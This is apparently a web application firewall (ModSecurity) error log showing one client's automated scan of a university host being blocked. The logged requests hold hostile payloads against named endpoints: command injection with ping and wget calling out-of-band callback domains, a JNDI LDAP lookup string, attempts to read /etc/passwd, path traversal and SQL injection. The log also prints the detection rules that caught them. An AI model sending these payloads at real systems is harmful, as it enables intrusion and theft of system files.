[Tue Aug 29 11:33:22.455701 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARR29oAAAAF"]
[Tue Aug 29 11:33:23.375265 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARo8xwAAAAT"]
[Tue Aug 29 11:33:24.312394 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgn1jdop3escaa8.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARjjLwAAAAL"]
[Tue Aug 29 11:33:24.361290 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARQ39wAAAAB"]
[Tue Aug 29 11:33:25.316419 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARTEOIAAAAG"]
[Tue Aug 29 11:33:25.349673 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARLXwEAAAAQ"]
[Tue Aug 29 11:33:25.352859 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARiDm0AAAAJ"]
[Tue Aug 29 11:33:26.448454 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAAQKOkQAAAAs"]
[Tue Aug 29 11:33:26.490692 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlg3j39y5q58bxkx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAAQKOkYAAAAs"]
[Tue Aug 29 11:33:27.305097 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARA7gUAAAAA"]
[Tue Aug 29 11:33:27.305456 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAANsAfUAAAAD"]
[Tue Aug 29 11:33:27.386881 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARv7REAAAAY"]
[Tue Aug 29 11:33:29.346623 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARA7g8AAAAA"]
[Tue Aug 29 11:33:29.379760 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARt-9oAAAAV"]
[Tue Aug 29 11:33:29.382395 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibft.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARt-9oAAAAV"]
[Tue Aug 29 11:33:32.029747 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAANsAg0AAAAD"]
[Tue Aug 29 11:33:32.105592 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlg764btegmhwbpb.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARLXyIAAAAQ"]
[Tue Aug 29 11:33:32.340497 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAASAHZMAAAAH"]
[Tue Aug 29 11:33:34.341560 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAASAHaAAAAAH"]
[Tue Aug 29 11:33:35.362842 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAASAHaQAAAAH"]
[Tue Aug 29 11:33:35.371509 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARjjNwAAAAL"]
[Tue Aug 29 11:33:35.401217 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARt--EAAAAV"]
[Tue Aug 29 11:33:36.358456 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARLXzMAAAAQ"]
[Tue Aug 29 11:33:36.398206 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARLXzUAAAAQ"]
[Tue Aug 29 11:33:37.308408 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAARo80sAAAAT"]
[Tue Aug 29 11:33:37.368657 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAAOJKfUAAAAE"]
[Tue Aug 29 11:33:37.371770 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARy-wIAAAAb"]
[Tue Aug 29 11:33:39.303467 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11I8Co-f0AAANsAi4AAAAD"]
[Tue Aug 29 11:33:39.353741 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11I8Co-f0AAASAHbkAAAAH"]
